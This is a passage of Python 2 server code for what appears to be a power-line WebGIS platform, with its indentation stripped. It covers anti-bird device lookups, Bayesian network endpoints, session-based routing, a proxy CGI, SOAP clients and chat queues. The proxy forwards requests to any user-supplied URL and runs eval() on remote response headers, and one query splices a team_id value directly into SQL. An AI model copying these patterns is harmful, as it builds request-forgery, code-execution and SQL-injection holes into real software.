obj = json.loads(objstr)
if isinstance(obj, dict) :
if obj.has_key('result'):
print('antibird/get_latest_records error:%s' % obj['result'])
else:
if obj.has_key('_id'):
ret = [obj, ]
else:
print('antibird/get_latest_records error: unknown error')
ret = []
elif isinstance(obj, list) :
ret = obj
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
print('antibird/get_latest_records error:%s' % e.message)
else:
print('antibird/get_latest_records error:%s' % str(e))
for item in ret:
idx = ret.index(item)
if item.has_key('picture') and isinstance(item['picture'], list):
for i in item['picture']:
idx1 = item['picture'].index(i)
item['picture'][idx1] = '/proxy/api/image/%s' % i
ret[idx] = item
return ret
def get_latest_records_by_imei(environ, querydict):
ret = get_latest_records(environ, querydict)
return json.dumps(ret, ensure_ascii=True, indent=4)
def get_equip_list(environ, querydict):
ret = ''
is_filter_used=False
if querydict.has_key('is_filter_used') and querydict['is_filter_used'] is True:
is_filter_used = True
equip_list = init_list(environ)
if not is_filter_used:
ret = json.dumps(equip_list, ensure_ascii=True, indent=4)
else:
exist = []
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置"
}
}
},
0,
'webgis'
)
for i in l:
for j in i['properties']['metals']:
if isinstance(j, dict) and j.has_key('imei'):
if not j['imei'] in exist:
exist.append(j['imei'])
while len(exist)>0:
i0 = exist[0]
for i in equip_list:
if i['imei'] == i0:
equip_list.remove(i)
exist.remove(i0)
break
ret = json.dumps(equip_list, ensure_ascii=True, indent=4)
return ret
def equip_tower_mapping(querydict):
ret = {}
if querydict.has_key('imei'):
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置",
"imei":querydict['imei']
}
}
},
0,
'webgis'
)
if len(l)>0:
obj = {}
obj['tower_id'] = l[0]['_id']
obj['name'] = l[0]['properties']['name']
obj['lng'] = l[0]['geometry']['coordinates'][0]
obj['lat'] = l[0]['geometry']['coordinates'][1]
obj['alt'] = l[0]['geometry']['coordinates'][2]
ret[querydict['imei']] = obj
else:
l = db_util.mongo_find(
gConfig['webgis']['mongodb']['database'],
'features',
{
"properties.webgis_type":"point_tower",
"properties.metals":{
"$elemMatch":{
"type":u"多功能驱鸟装置",
}
}
},
0,
'webgis'
)
for i in l:
for j in i['properties']['metals']:
if j.has_key('type') and j['type'] == u'多功能驱鸟装置' and j.has_key('imei') and len(j['imei'])>0:
obj = {}
obj['tower_id'] = i['_id']
obj['name'] = i['properties']['name']
obj['lng'] = i['geometry']['coordinates'][0]
obj['lat'] = i['geometry']['coordinates'][1]
obj['alt'] = i['geometry']['coordinates'][2]
ret[j['imei']] = obj
ret = json.dumps(ret, ensure_ascii=True, indent=4)
return ret
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if args.has_key('imei') and isinstance(querydict, dict):
querydict['imei'] = args['imei']
if args.has_key('records_num') and isinstance(querydict, dict):
querydict['records_num'] = args['records_num']
if endpoint == 'get_equip_list':
body = get_equip_list(environ, querydict)
elif endpoint == 'get_latest_records_by_imei':
body = get_latest_records_by_imei(environ, querydict)
elif endpoint == 'equip_tower_mapping':
body = equip_tower_mapping(querydict)
return statuscode, headers, body
def handle_bayesian(environ):
def get_collection(collection):
ret = None
db_util.mongo_init_client('webgis')
db = db_util.gClientMongo['webgis'][gConfig['webgis']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
# def convert_strkey_to_bool(obj):
# if isinstance(obj, list):
# for i in range(0, len(obj)):
# obj[i] = convert_strkey_to_bool(obj[i])
# if isinstance(obj, dict):
# for k in obj.keys():
# if k in ['true', u'true']:
# obj[True] = obj[k]
# del obj['true']
# del obj[u'true']
# elif k in ['false', u'false']:
# obj[False] = obj[k]
# del obj['false']
# del obj[u'false']
# obj[k] = convert_strkey_to_bool(obj[k])
#
# return obj
def save_by_id(querydict, collection_name):
ret = []
collection = get_collection(collection_name)
if isinstance(querydict, list):
ids = []
for i in querydict:
if i['_id'] is None:
del i['_id']
id = collection.save(db_util.add_mongo_id(i))
if id:
ids.append(id)
ret = list(collection.find({'_id':{'$in':ids}}))
elif isinstance(querydict, dict):
id = collection.save(db_util.add_mongo_id(querydict))
ret = collection.find_one({'_id':id})
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def delete_by_id(querydict, collection_name):
ret = ''
collection = get_collection(collection_name)
if querydict.has_key('_id'):
if isinstance(querydict['_id'], str) or isinstance(querydict['_id'], unicode):
existone = collection.find_one({'_id':db_util.add_mongo_id(querydict['_id'])})
if existone:
collection.remove({'_id':existone['_id']})
ret = json.dumps(db_util.remove_mongo_id(existone), ensure_ascii=True, indent=4)
else:
ret = json.dumps({'result':u'record_not_exist' }, ensure_ascii=True, indent=4)
if isinstance(querydict['_id'], list):
ids = db_util.add_mongo_id(querydict['_id'])
cond = {'_id':{'$in':ids}}
collection.remove(cond)
ret = json.dumps(db_util.remove_mongo_id(querydict['_id']), ensure_ascii=True, indent=4)
return ret
def bayesian_query_domains_range(querydict):
ret = []
collection = get_collection('bayesian_domains_range')
ret = list(collection.find({}))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def bayesian_save_domains_range(querydict):
return save_by_id(querydict, 'bayesian_domains_range')
def bayesian_delete_domains_range(querydict):
return delete_by_id(querydict, 'bayesian_domains_range')
def bayesian_query_node(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
collection = get_collection('bayesian_nodes')
ret = list(collection.find({'line_name':querydict['line_name']}))
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def bayesian_query_graphiz(querydict):
ret = ''
if querydict.has_key('line_name') and len(querydict['line_name']):
g = create_bbn_by_line_name(querydict['line_name'])
dpi = 100
rankdir = 'LL'
if querydict.has_key('dpi') and len(querydict['dpi']):
dpi = int(querydict['dpi'])
if querydict.has_key('rankdir') and len(querydict['rankdir']):
rankdir = querydict['rankdir']
ret = g.get_graphviz_source(dpi, rankdir)
return enc(ret)
def bayesian_save_node(querydict):
return save_by_id(querydict, 'bayesian_nodes')
def bayesian_delete_node(querydict):
ret = '[]'
delete_by_id(querydict, 'bayesian_nodes')
collection = get_collection('bayesian_nodes')
if querydict.has_key('names'):
if isinstance(querydict['names'], list):
# names = [str(i) for i in querydict['names']]
names = querydict['names']
l = list(collection.find({'conditions': {'$elemMatch': {'$elemMatch': {'$elemMatch': {'$elemMatch':{'$in': names}}}}}}))
for i in l:
existlist = []
conditions = []
for ii in i['conditions']:
idx = i['conditions'].index(ii)
tmp = []
for iii in ii[0]:
# idx1 = ii[0].index(iii)
if not iii[0] in names:
tmp.append(iii)
ii[0] = tmp
i['conditions'][idx] = ii
for ii in i['conditions']:
key = ''
for iii in ii[0]:
key += iii[0] + ':' + iii[1] + '|'
if not key in existlist:
existlist.append(key)
conditions.append(ii)
i['conditions'] = conditions
collection.save(i)
if querydict.has_key('line_name') and len(querydict['line_name'])>0:
ret = bayesian_query_node(querydict)
return ret
def bayesian_query_predict(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
g = create_bbn_by_line_name(querydict['line_name'])
del querydict['line_name']
qd = {}
querymulti = False
for k in querydict.keys():
if isinstance(querydict[k], unicode):
qd[str(k)] = str(querydict[k])
elif isinstance(querydict[k], list) and k == u'line_state':
querymulti = True
else:
qd[str(k)] = querydict[k]
if querymulti:
for i in querydict['line_state']:
qd['line_state'] = str(i)
ret.append({'line_state':i, 'result':bayes_util.query_bbn_condition(g, **qd)})
else:
ret = bayes_util.query_bbn_condition(g, **qd)
ret = json.dumps(ret, ensure_ascii=True, indent=4)
return ret
def reset_unit_by_line_name(line_name):
collection = get_collection('bayesian_nodes')
units = list(collection.find({'line_name':line_name, 'name':{'$regex':'^unit_[0-9]$'}}))
data = bayes_util.get_state_examination_data_by_line_name(line_name)
o = bayes_util.calc_probability_unit(data)
for unit in units:
if o.has_key(unit['name']):
unit['conditions'] = o[unit['name']]
# print(unit['name'])
# print(unit['conditions'])
collection.save(unit)
ret = list(collection.find({'line_name':line_name}).sort('name', pymongo.ASCENDING))
return ret
def bayesian_reset_unit(querydict):
ret = []
if querydict.has_key('line_name') and len(querydict['line_name']):
ret = reset_unit_by_line_name(querydict['line_name'])
ret = json.dumps(db_util.remove_mongo_id(ret), ensure_ascii=True, indent=4)
return ret
def build_additional_condition(line_name, cond):
ret = cond
collection = get_collection('bayesian_nodes')
l = list(collection.find({'line_name':line_name}))
for node in l:
ret[node['name']] = node['conditions']
return ret
def create_bbn_by_line_name(line_name):
cond = bayes_util.build_state_examination_condition(line_name)
cond = build_additional_condition(line_name, cond)
g = None
if bayes_util.USE_C_MODULE:
print('using c-accelerate module...')
g = bayes_util.build_bbn_from_conditionals(cond)
else:
print('using pure-python module...')
g = bayes_util.build_bbn_from_conditionals_plus(cond)
return g
statuscode, headers, body = '200 OK', {}, ''
urls = gUrlMap.bind_to_environ(environ)
querydict, buf = get_querydict_by_GET_POST(environ)
endpoint, args = urls.match()
if args.has_key('_id') and isinstance(querydict, dict):
querydict['_id'] = args['_id']
if endpoint == 'bayesian_query_node':
body = bayesian_query_node(querydict)
elif endpoint == 'bayesian_save_node':
body = bayesian_save_node(querydict)
elif endpoint == 'bayesian_query_predict':
body = bayesian_query_predict(querydict)
elif endpoint == 'bayesian_reset_unit':
body = bayesian_reset_unit(querydict)
elif endpoint == 'bayesian_query_graphiz':
body = bayesian_query_graphiz(querydict)
headers['Content-Type'] = 'text/plain'
elif endpoint == 'bayesian_delete_node':
body = bayesian_delete_node(querydict)
elif endpoint == 'bayesian_save_domains_range':
body = bayesian_save_domains_range(querydict)
elif endpoint == 'bayesian_delete_domains_range':
body = bayesian_delete_domains_range(querydict)
elif endpoint == 'bayesian_query_domains_range':
body = bayesian_query_domains_range(querydict)
return statuscode, headers, body
headers = {}
headerslist = []
cookie_header = None
statuscode = '200 OK'
body = ''
path_info = environ['PATH_INFO']
if 'proxy.cgi' in path_info:
statuscode, headers, body = handle_proxy_cgi(environ)
elif path_info == '/test':
statuscode, headers, body = handle_test(environ)
elif path_info == '/get':
statuscode, headers, body = handle_get_method(environ)
elif path_info == '/post':
statuscode, headers, body = handle_post_method(environ)
elif path_info == '/wmts':
statuscode, headers, body = handle_wmts(environ)
elif path_info == '/tiles':
statuscode, headers, body = handle_tiles(environ)
elif '/arcgistile' in path_info:
statuscode, headers, body = handle_arcgistile(environ)
elif path_info == '/terrain/layer.json' or path_info[-8:] == '.terrain':
statuscode, headers, body = handle_terrain(environ)
#elif path_info[-8:] == '.terrain':
#return handle_terrain1(environ)
# elif path_info == '/wfs':
# statuscode, headers, body = handle_wfs(environ)
elif path_info =='/create_cluster' or path_info =='/kill_cluster':
statuscode, headers, body = handle_cluster(environ)
elif path_info == '/websocket':
statuscode, headers, body = handle_websocket(environ)
elif len(path_info)>6 and path_info[:6] == '/proxy':
statuscode, headers, body = proxy(environ)
headers['Cache-Control'] = 'no-cache'
# elif path_info == '/anti_bird_equip_list':
# statuscode, headers, body = anti_bird_equip_list(environ)
# elif path_info == '/anti_bird_equip_tower_mapping':
# statuscode, headers, body = anti_bird_equip_tower_mapping(environ)
# elif path_info == '/anti_bird_get_latest_records_by_imei':
# statuscode, headers, body = anti_bird_get_latest_records_by_imei(environ)
else:
if path_info[-1:] == '/':
path_info = gConfig['web']['indexpage']
if str(gConfig['webgis']['session']['enable_session'].lower()) == 'true' :
# and path_info in ['/login', '/logout', gConfig['web']['loginpage'], gConfig['web']['indexpage'], gConfig['web']['mainpage']]:
if gSessionStore is None:
gSessionStore = FilesystemSessionStore()
is_expire = False
with session_manager(environ):
sess, cookie_header, is_expire = session_handle(environ, gRequest, gSessionStore)
if path_info == str(gConfig['web']['unauthorizedpage']):
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
start_response('401 Unauthorized', headerslist)
return [body]
if path_info == '/logout':
gSessionStore.delete(sess)
sess, cookie_header, is_expire = session_handle(environ, gRequest, gSessionStore)
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps({'result':u'ok'}, ensure_ascii=True, indent=4)]
if is_expire:
if not sess.has_key('ip'):
sess['ip'] = environ['REMOTE_ADDR']
gSessionStore.save_if_modified(sess)
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
start_response('401 Unauthorized', headerslist)
return [body]
# headerslist.append(('Location', str(gConfig['web']['expirepage'])))
# start_response('302 Redirect', headerslist)
# return ['']
# headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
# statuscode = '200 OK'
# body = json.dumps({'result':u'session_expired'}, ensure_ascii=True, indent=4)
if path_info == '/login':
user = handle_login(environ)
if user:
sess = gSessionStore.session_class(user, sess.sid, False)
sess['username'] = user['username']
cookie_header = set_cookie_data(gRequest, {'_id':user['_id'], 'username': user['username'], 'displayname': user['displayname']})
gSessionStore.save_if_modified(sess)
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps(sess, ensure_ascii=True, indent=4)]
else:
headerslist.append(cookie_header)
headerslist.append(('Content-Type', 'text/json;charset=' + ENCODING))
start_response('200 OK', headerslist)
return [json.dumps({'result':u'用户名或密码错误'}, ensure_ascii=True, indent=4)]
if path_info == str(gConfig['web']['mainpage']):
#401 Unauthorized
#if session_id is None or token is None:
headerslist.append(('Content-Type', str(gConfig['mime_type']['.html'])))
headerslist.append(cookie_header)
if sess is None or len(sess.keys())==0 or len(sess.sid)==0 or not sess.has_key('username'):
statuscode, headers, body = handle_static(environ, gConfig['web']['unauthorizedpage'])
statuscode = '401 Unauthorized'
start_response(statuscode, headerslist)
return [body]
if not is_expire and len(sess.sid)>0:
if 'state_examination' in path_info:
statuscode, headers, body = handle_state_examination(environ)
elif 'bayesian/' in path_info:
statuscode, headers, body = handle_bayesian(environ)
elif 'antibird/' in path_info:
statuscode, headers, body = handle_antibird(environ)
else:
statuscode, headers, body = handle_static(environ, path_info)
else:
if path_info == '/login' and str(gConfig['webgis']['session']['enable_session'].lower()) != 'true':
path_info = gConfig['web']['mainpage']
if 'state_examination/' in path_info:
statuscode, headers, body = handle_state_examination(environ)
elif 'antibird/' in path_info:
statuscode, headers, body = handle_antibird(environ)
elif 'bayesian/' in path_info:
statuscode, headers, body = handle_bayesian(environ)
else:
statuscode, headers, body = handle_static(environ, path_info)
#headkeys = set([i[0] for i in headerslist])
headers = CORS_header(headers)
if cookie_header:
headerslist.append(cookie_header)
for k in headers:
headerslist.append((k, headers[k]))
#print(headerslist)
# headerslist = add_to_headerlist(headerslist, 'Cache-Control', 'no-cache')
# print(headerslist)
start_response(statuscode, headerslist)
return [body]
def add_to_headerlist(headerslist, key, value):
ret = headerslist
existidx = -1
for i in ret:
if i[0] == key:
existidx = ret.index(i)
break
if existidx < 0:
ret.append((key, value))
else:
ret[existidx] = (key, value)
return ret
def application_markdown(environ, start_response):
global gConfig, gRequest, gSessionStore
headers = {}
headerslist = []
path_info = environ['PATH_INFO']
if path_info == '/get':
statuscode, headers, body = handle_get_method(environ)
elif path_info == '/post':
statuscode, headers, body = handle_post_method(environ)
else:
if path_info[-1:] == '/':
path_info += gConfig['web']['indexpage']
statuscode, headers, body = handle_static(environ, path_info)
headers = CORS_header(headers)
for k in headers:
headerslist.append((k, headers[k]))
start_response(statuscode, headerslist)
return [body]
def handle_proxy_cgi(environ):
global gConfig, gHttpClient
method = environ['REQUEST_METHOD']
post_data = ''
if method == "POST":
qs = environ['PATH_INFO']
buf = environ['wsgi.input'].read()
post_data = urllib.unquote_plus(buf)
d = cgi.parse(None, environ)
if d.has_key("url"):
url = d["url"][0]
else:
url = 'http://XIEJUN-DESKTOP:88'
else:
fs = cgi.FieldStorage()
url = fs.getvalue('url', "http://XIEJUN-DESKTOP:88")
s = ''
headers = {'Content-Type': 'text/plain;charset=' + ENCODING}
try:
if url.startswith("http://") or url.startswith("https://"):
request = None
response = None
http = None
urlobj = URL(url)
if not gHttpClient.has_key('proxy_cgi'):
gHttpClient['proxy_cgi'] = HTTPClient(urlobj.host, port=urlobj.port, concurrency=100)
client = gHttpClient['proxy_cgi']
if method == "POST":
#length = int(environ["CONTENT_LENGTH"])
headers["Content-Type"] = environ["CONTENT_TYPE"]
response = client.post(urlobj.request_uri, post_data, headers)
else:
response = client.get(urlobj.request_uri)
if response:
h = str(response.info())
#if i.has_key("Content-Type"):
#print("Content-Type: %s" % (i["Content-Type"]))
hh = eval(h)
responseh = []
for i in hh:
if i[0] in ['Content-Type', 'Date', 'Server', ]:
responseh.append(i)
s = response.read()
client.close()
headers['Content-Length'] = str(len(s))
else:
s += "Illegal request."
except Exception, E:
s += "Status: 500 Unexpected Error"
s += "Content-Type: text/plain"
s += "Some unexpected error occurred. Error text was:%s" % E.message
return '200 OK', headers, s
def get_host_ip():
ret = []
if sys.platform == 'win32':
ret.append('127.0.0.1')
localIP = socket.gethostbyname(socket.gethostname())
#print ("local ip:%s " % localIP)
ipList = socket.gethostbyname_ex(socket.gethostname())
for i in ipList:
if i != localIP:
#if isinstance(i, str):
#print(re.findall('\d+\.\d+\.\d+\.\d+',i))
if isinstance(i, list):
for ii in i:
if len(re.findall('\d+\.\d+\.\d+\.\d+',ii))>0:
ret.append(ii)
#print("external IP:%s" % i )
elif 'linux' in sys.platform:
import commands
ips = commands.getoutput("/sbin/ifconfig | grep -i \"inet\" | grep -iv \"inet6\" | awk {'print $2'} | sed -ne 's/addr\:/ /p'")
arr = ips.split('\n')
for i in arr:
ret.append(i.strip())
return ret
def clear_tmp():
tmp_dir = r'C:\Users\Jeffrey\AppData\Local\ESRI\Local Caches\MapCacheV1'
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
tmp_dir = r'C:\Users\Jeffrey\AppData\Local\ESRI\Local Caches\GlobeCache'
if os.path.exists(tmp_dir):
shutil.rmtree(tmp_dir)
def get_scaleDenominator(zoomlist):
#tileMatrixMaxX = tileMatrixMinX + tileWidth * (scaleDenominator * pixelSize / metersPerUnit) * matrixWidth
#tileMatrixMinY = tileMatrixMaxY - tileHeight * (scaleDenominator * pixelSize / metersPerUnit) * matrixHeight
#tileWidth * (scaleDenominator * pixelSize / metersPerUnit) * matrixWidth = tileMatrixMaxX - tileMatrixMinX
#tileHeight * (scaleDenominator * pixelSize / metersPerUnit) * matrixHeight = tileMatrixMaxY - tileMatrixMinY
#scaleDenominator * pixelSize / metersPerUnit = (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator * pixelSize / metersPerUnit = (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
#scaleDenominator * pixelSize = metersPerUnit * (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator * pixelSize = metersPerUnit * (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
#scaleDenominator = metersPerUnit/pixelSize * (tileMatrixMaxX - tileMatrixMinX)/(tileWidth * matrixWidth)
#scaleDenominator = metersPerUnit/pixelSize * (tileMatrixMaxY - tileMatrixMinY)/(tileHeight * matrixHeight)
metersPerUnit = float(gConfig['wmts']['metersPerUnit'])
pixelSize = float(gConfig['wmts']['pixelSize'])
tileWidth,tileHeight = 256.0, 256.0
tileMatrixMinX, tileMatrixMaxX = (26.0, 102.0), (26.0, 104.0)
tileMatrixMinY, tileMatrixMaxY = (24.0, 102.0), (26.0, 102.0)
for i in zoomlist:
#print('%d=%d' % (i , mapUtils.tiles_on_level(i)))
#mapUtils.countDistanceFromLatLon()
matrixHeight = matrixWidth = mapUtils.tiles_on_level(i)
print('%d=%d' % (i , matrixHeight))
#scaleDenominatorX = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxX , tileMatrixMinX) * 1000./(tileWidth * matrixWidth)
#scaleDenominatorY = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000./(tileHeight * matrixHeight)
#print('scaleDenominatorX=%f, scaleDenominatorY=%f' % (scaleDenominatorX, scaleDenominatorY))
#scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) * 1000. /(tileHeight * matrixHeight)
scaleDenominator = metersPerUnit/pixelSize * mapUtils.countDistanceFromLatLon(tileMatrixMaxY , tileMatrixMinY) /(tileHeight * matrixHeight)
print('scaleDenominator=%f' % scaleDenominator)
def ToGeographic(mercatorX_lon, mercatorY_lat):
if abs(mercatorX_lon) < 180 and abs(mercatorY_lat) < 90:
return 0, 0
if abs(mercatorX_lon) > 20037508.3427892 or abs(mercatorY_lat) > 20037508.3427892 :
return 0, 0
x = mercatorX_lon;
y = mercatorY_lat;
num3 = x / 6378137.0;
num4 = num3 * 57.295779513082323;
num5 = math.floor(float(num4 + 180.0) / 360.0)
num6 = num4 - (num5 * 360.0)
num7 = 1.5707963267948966 - (2.0 * math.atan(math.exp((-1.0 * y) / 6378137.0)))
lon = num6
lat = num7 * 57.295779513082323
return lon, lat
def ToWebMercator(lon, lat):
if abs(lon) > 180 or abs(lat) > 90:
return 0, 0
num = lon * 0.017453292519943295
x = 6378137.0 * num
a = lat * 0.017453292519943295
mercatorX_lon = x
mercatorY_lat = 3189068.5 * math.log((1.0 + math.sin(a)) / (1.0 - math.sin(a)))
return mercatorX_lon, mercatorY_lat
def handle_requset_sync(obj):
ret = {'result':''}
if obj.has_key('area') and obj['area'] and len(obj['area'])>0:
kmgd, kmgdgeo, kmgdgeotmp = db_util.create_sde_conn(obj['area'])
if obj.has_key('odbc'):
if obj['odbc'] == 'TABLE_LINE':
l = db_util.odbc_get_records('TABLE_LINE', '1=1', obj['area'])
ret['result']= l
elif obj['odbc'] == 'TABLE_TOWER':
l = db_util.odbc_get_records('TABLE_TOWER', '1=1', obj['area'])
ret['result']= l
elif obj.has_key('op'):
if obj['op']=='download_task':
condition = '1=1'
if obj.has_key('team_id'):
condition += " AND team_id='%s'" % obj['team_id']
l = db_util.odbc_get_records('VIEW_TASK_ITEM', condition, obj['area'])
ret['result']= l
#elif obj['op']=='get_latest_stamp':
#f = '%Y-%m-%d %H:%M:%S'
#if obj.has_key('format'):
#f = obj['format']
#ret['result']= db_util.get_latest_stamp(f, obj['area'])
#elif obj['op']=='get_latest_3dd_stamp':
#f = '%Y-%m-%d %H:%M:%S'
#if obj.has_key('format'):
#f = obj['format']
#ret['result']= db_util.get_latest_3dd_stamp(f, obj['area'])
else:
print('unknown area')
ret['result'] = []
return ret
def soap_login():
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.login(username='', password='')
result = response['Result']
return result
def parse_thunder_counter_xml(xml):
ret = []
root = etree.fromstring(xml)
if root:
for Flash in root:
obj = {}
for child in Flash:
obj[child.tag] = child.text
ret.append(obj)
return ret
def soap_GetFlashofDate(start_time, end_time):
ret = {}
try:
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.GetFlashofDate(in0=start_time, in1=end_time)
result = response['Result']
ret = parse_thunder_counter_xml(result)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret['err'] = sys.exc_info()[1].message
if hasattr(sys.exc_info()[1], 'reason'):
ret['err'] = str(sys.exc_info()[1].reason)
return ret
def soap_GetFlashofEnvelope(start_time, end_time, lng1, lng2, lat1, lat2):
ret = {}
try:
client = SoapClient(wsdl='%s?wsdl' % gConfig['webservice']['location'], namespace = gConfig['webservice']['namespace'], timeout=int(gConfig['webservice']['timeout']))
response = client.GetFlashofEnvelope(in0=start_time, in1=end_time, in2=lng1, in3=lng2, in4=lat1, in5=lat2)
result = response['Result']
ret = parse_thunder_counter_xml(result)
except:
if hasattr(sys.exc_info()[1], 'message'):
ret['err'] = sys.exc_info()[1].message
if hasattr(sys.exc_info()[1], 'reason'):
ret['err'] = str(sys.exc_info()[1].reason)
return ret
def delete_expired_session(interval):
global gSessionStore
while 1:
gevent.sleep(interval)
if gSessionStore:
#print('session recycle checking')
gSessionStore.delete_expired_list()
ws_send('session_list', ws_session_query())
def joinedqueue_consumer_pay():
global gConfig, gJoinableQueue
interval = float(gConfig['pay_platform']['queue']['queue_consume_interval'])
while 1:
gevent.sleep(interval)
item = None
try:
item = gJoinableQueue.get()
except:
item = None
if item:
try:
sign_and_send(item['thirdpay'], item['method'], item['url'], item['data'])
finally:
gJoinableQueue.task_done()
def chat_offline_save_log(obj):
global gConfig, gClientMongo
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
id = None
if obj['op'] not in ['chat/online', 'chat/offline', 'chat/info/online', 'chat/info/offline', 'chat/request/contact/remove', 'chat/request/group/quit'] and obj.has_key('to'):
offlinecol = 'chat_log_offline'
if gConfig['chat_platform']['mongodb'].has_key('collection_chat_log_offline'):
offlinecol = gConfig['chat_platform']['mongodb']['collection_chat_log_offline']
collection = get_collection(offlinecol)
id = collection.save(db_util.add_mongo_id(obj))
return id
def chat_save_log(obj):
global gConfig, gClientMongo
def get_collection(collection):
ret = None
db_util.mongo_init_client('chat_platform')
db = db_util.gClientMongo['chat_platform'][gConfig['chat_platform']['mongodb']['database']]
if not collection in db.collection_names(False):
ret = db.create_collection(collection)
else:
ret = db[collection]
return ret
id = None
if obj.has_key('op') and obj['op'] in ['chat/chat', 'chat/online', 'chat/offline']:
collection = get_collection(gConfig['chat_platform']['mongodb']['collection_chat_log'])
# if obj.has_key('timestamp'):
# obj['timestamp'] = datetime.datetime.fromtimestamp(obj['timestamp']/1000).strftime('%Y-%m-%d %H:%M:%S')
if obj['op'] in ['chat/online', 'chat/offline']:
obj1 = copy.deepcopy(obj)
for k in obj1.keys():
if not k in ['from', 'timestamp', 'op', 'to']:
del obj1[k]
if obj1.has_key('_id'):
del obj1['_id']
id = collection.save(db_util.add_mongo_id(obj1))
else:
id = collection.save(db_util.add_mongo_id(obj))
return id
def joinedqueue_consumer_chat():
global gConfig, gJoinableQueue, gWebSocketsMap
interval = float(gConfig['chat_platform']['queue']['queue_consume_interval'])
while 1:
gevent.sleep(interval)
item = None
try:
item = gJoinableQueue.get()
except:
item = None
if item:
try:
g = gevent.spawn(chat_save_log, item)
k = item['to']
if gWebSocketsMap.has_key(k):
for ws in gWebSocketsMap[k]:
if not ws.closed:
ws.send(json.dumps(item, ensure_ascii=True, indent=4))
else:
gevent.spawn(chat_offline_save_log, item)
finally:
gJoinableQueue.task_done()
def tcp_reconnect_check(interval=1):
global gConfig, gTcpReconnectCounter, gTcpSock
tcp_reconnect_threshold = int(gConfig['webgis']['anti_bird']['tcp_reconnect_threshold'])
gTcpReconnectCounter = tcp_reconnect_threshold
while 1:
gTcpReconnectCounter += interval
#print(gTcpReconnectCounter)
if gTcpReconnectCounter > tcp_reconnect_threshold:
gTcpReconnectCounter = 0
print('[%s]Trying to reconnect to anti-bird tcpserver [%s:%s]...' % (time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), gConfig['webgis']['anti_bird']['tcp_host'], gConfig['webgis']['anti_bird']['tcp_port']))
if gTcpSock:
if not gTcpSock.closed:
gTcpSock.close()
del gTcpSock
gTcpSock = None
gevent.sleep(interval)
def tcp_print_exception():
e = sys.exc_info()[1]
message = ''
if hasattr(e, 'strerror'):
message = e.strerror
if message is None and hasattr(e, 'message'):
message = e.message
elif hasattr(e, 'message'):
message = e.message
else:
message = str(e)
print('connecting anti-bird server fail:%s' % message)
def tcp_connect():
global gConfig
tcp_host = gConfig['webgis']['anti_bird']['tcp_host']
tcp_port = int(gConfig['webgis']['anti_bird']['tcp_port'])
timeout = 5.0
try:
timeout = float(gConfig['webgis']['anti_bird']['tcp_timeout'])
except:
timeout = 5.0
sock = socket.create_connection((tcp_host, tcp_port), timeout=timeout)
sock.settimeout(None)
#sock = socket.create_connection((tcp_host, tcp_port))
sock.send("bird")
return sock
def tcp_recv(sock=None):
global gConfig, gWebSocketsMap, gTcpReconnectCounter, gTcpSock
def get_packet(astr):
ret = ''
rest = astr
if '###' in astr:
idx0 = astr.index('###') + 3
astr = astr[idx0:]
if '###' in astr:
idx1 = astr.index('###')
ret = astr[:idx1]
rest = astr[idx1+3:]
return ret, rest
def get_packets(astr):
ret = []
p, rest = get_packet(astr)
while len(p)>0:
ret.append(p)
p, rest = get_packet(rest)
return ret, rest
def send_to_client(packets):
for imei in packets:
try:
obj = {'imei':imei}
for k in gWebSocketsMap.keys():
ws = gWebSocketsMap[k]
if not ws.closed:
ws.send(json.dumps(obj, ensure_ascii=True, indent=4))
except:
e = sys.exc_info()[1]
if hasattr(e, 'message'):
print('send_to_client error:%s' % e.message)
